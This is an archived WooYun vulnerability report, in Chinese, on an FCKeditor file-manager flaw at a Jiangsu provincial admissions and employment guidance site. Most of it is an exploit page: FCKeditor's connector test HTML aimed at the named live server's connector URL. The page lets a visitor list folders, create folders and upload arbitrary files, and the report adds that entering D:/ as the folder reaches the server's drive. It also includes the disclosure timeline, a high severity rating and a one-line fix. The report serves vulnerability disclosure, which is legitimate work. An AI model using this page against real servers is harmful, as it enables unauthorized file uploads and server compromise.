乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-16: 细节已通知厂商并且等待厂商处理中 2014-01-21: 厂商已经确认,细节仅向厂商公开 2014-01-31: 细节向核心白帽子及相关领域专家公开 2014-02-10: 细节向普通白帽子公开 2014-02-20: 细节向实习白帽子公开 2014-03-02: 细节向公众公开
江苏省高校招生就业指导服务中心 编辑器漏洞导致系统被入侵
http://www.91job.gov.cn:2008/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
利用代码如下
<!--* FCKeditor - The text editor for Internet - http://www.fckeditor.net* Copyright (C) 2003-2007 Frederico Caldeira Knabben** == BEGIN LICENSE ==** Licensed under the terms of any of the following licenses at your* choice:** - GNU General Public License Version 2 or later (the "GPL")* http://www.gnu.org/licenses/gpl.html** - GNU Lesser General Public License Version 2.1 or later (the "LGPL")* http://www.gnu.org/licenses/lgpl.html** - Mozilla Public License Version 1.1 or later (the "MPL")* http://www.mozilla.org/MPL/MPL-1.1.html** == END LICENSE ==** Test page for the File Browser connectors.--><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>FCKeditor - Connectors Tests</title> <script type="text/javascript">function BuildBaseUrl( command ){ var sUrl = document.getElementById('cmbConnector').value + '?Command=' + command + '&Type=' + document.getElementById('cmbType').value + '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ; return sUrl ;}function SetFrameUrl( url ){ document.getElementById('eRunningFrame').src = url ; document.getElementById('eUrl').innerHTML = url ;}function GetFolders(){ SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ; return false ;}function GetFoldersAndFiles(){ SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ; return false ;}function CreateFolder(){ var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ; if ( ! sFolder ) return false ; var sUrl = BuildBaseUrl( 'CreateFolder' ) ; sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ; SetFrameUrl( sUrl ) ; return false ;}function OnUploadCompleted( errorNumber, fileName ){ switch ( errorNumber ) { case 0 : alert( 'File uploaded with no errors' ) ; break ; case 201 : GetFoldersAndFiles() ; alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ; break ; case 202 : alert( 'Invalid file' ) ; break ; default : alert( 'Error on file upload. Error number: ' + errorNumber ) ; break ; }}this.frames.frmUpload = this ;function SetAction(){ var sUrl = BuildBaseUrl( 'FileUpload' ) ; document.getElementById('eUrl').innerHTML = sUrl ; document.getElementById('frmUpload').action = sUrl ;} </script></head><body> <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"> <tr> <td> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td> Connector:<br /> <select id="cmbConnector" name="cmbConnector"> <option value="http://www.91job.gov.cn:2008/fckeditor/editor/filemanager/connectors/aspx/connector.aspx" selected="selected">ASP.Net</option> </select> </td> <td> </td> <td> Current Folder<br /> <input id="txtFolder" type="text" value="/" name="txtFolder" /></td> <td> </td> <td> Resource Type<br /> <select id="cmbType" name="cmbType"> <option value="File" selected="selected">File</option> <option value="Image">Image</option> <option value="Flash">Flash</option> <option value="Media">Media</option> <option value="Invalid">Invalid Type (for testing)</option> </select> </td> </tr> </table> <br /> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td valign="top"> <a href="#" onclick="GetFolders();">Get Folders</a></td> <td> </td> <td valign="top"> <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td> <td> </td> <td valign="top"> <a href="#" onclick="CreateFolder();">Create Folder</a></td> <td> </td> <td valign="top"> <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data"> File Upload<br /> <input id="txtFileUpload" type="file" name="NewFile" /> <input type="submit" value="Upload" onclick="SetAction();" /> </form> </td> </tr> </table> <br /> URL: <span id="eUrl"></span> </td> </tr> <tr> <td height="100%" valign="top"> <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%" height="100%"></iframe> </td> </tr> </table></body></html>
Current Folder 位置可填写 D:/ 效果可以重现
如上所示
修复编辑器
危害等级:高
漏洞Rank:12
确认时间:2014-01-21 08:33
暂无